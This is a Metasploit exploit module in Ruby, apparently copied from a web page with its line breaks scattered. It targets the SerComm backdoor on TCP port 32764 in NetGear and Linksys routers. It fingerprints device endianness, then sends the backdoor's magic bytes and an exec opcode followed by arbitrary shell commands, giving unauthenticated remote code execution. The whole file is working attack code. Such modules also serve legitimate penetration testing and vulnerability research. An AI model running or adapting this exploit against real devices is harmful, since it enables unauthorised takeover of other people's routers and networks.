##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require
'msf/core'
class
Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerEcho
def
initialize(info={})
super
(update_info(info,
'Name'
=>
"SerComm Device Remote Code Execution"
,
'Description'
=> %q{
This
module
will cause remote code execution on several SerComm devices.
These devices typically include routers from NetGear
and
Linksys.
Tested against NetGear
DG834
.
},
'License'
=>
MSF_LICENSE
,
'Author'
=>
[
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>'
,
# Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
# Msf module
],
'Payload'
=>
{
'Space'
=>
10000
,
# Could be more, but this should be good enough
'DisableNops'
=>
true
},
'Platform'
=>
'linux'
,
'Privileged'
=>
false
,
'Targets'
=>
[
[
'Linux MIPS Big Endian'
,
{
'Arch'
=>
ARCH_MIPSBE
}
],
[
'Linux MIPS Little Endian'
,
{
'Arch'
=>
ARCH_MIPSLE
}
],
],
'DefaultTarget'
=>
0
,
'References'
=>
[
[
'OSVDB'
,
'101653'
],
],
'DisclosureDate'
=>
"Dec 31 2013"
))
register_options(
[
Opt::
RPORT
(
32764
)
],
self
.
class
)
end
def
check
fprint = endian_fingerprint
case
fprint
when
'BE'
print_status(
"Detected Big Endian"
)
return
Msf::Exploit::CheckCode::Vulnerable
when
'LE'
print_status(
"Detected Little Endian"
)
return
Msf::Exploit::CheckCode::Vulnerable
end
return
Msf::Exploit::CheckCode::Unknown
end
def
exploit
execute_cmdstager(
:noargs
=>
true
)
end
def
endian_fingerprint
begin
connect
sock.put(rand_text(
5
))
res = sock.get_once
disconnect
if
res && res.start_with?(
"MMcS"
)
return
'BE'
elsif
res && res.start_with?(
"ScMM"
)
return
'LE'
end
rescue
Rex::ConnectionError => e
print_error(
"Connection failed: #{e.class}: #{e}"
)
end
return
nil
end
def
execute_command(cmd, opts)
vprint_debug(cmd)
# Get the length of the command, for the backdoor's command injection
cmd_length = cmd.length
# 0x53634d4d => Backdoor code
# 0x07 => Exec command
# cmd_length => Length of command to execute, sent after communication struct
data = [0x53634d4d, 0x07, cmd_length].pack(
"VVV"
)
connect
# Send command structure followed by command text
sock.put(data+cmd)
disconnect
Rex.sleep(
1
)
end
end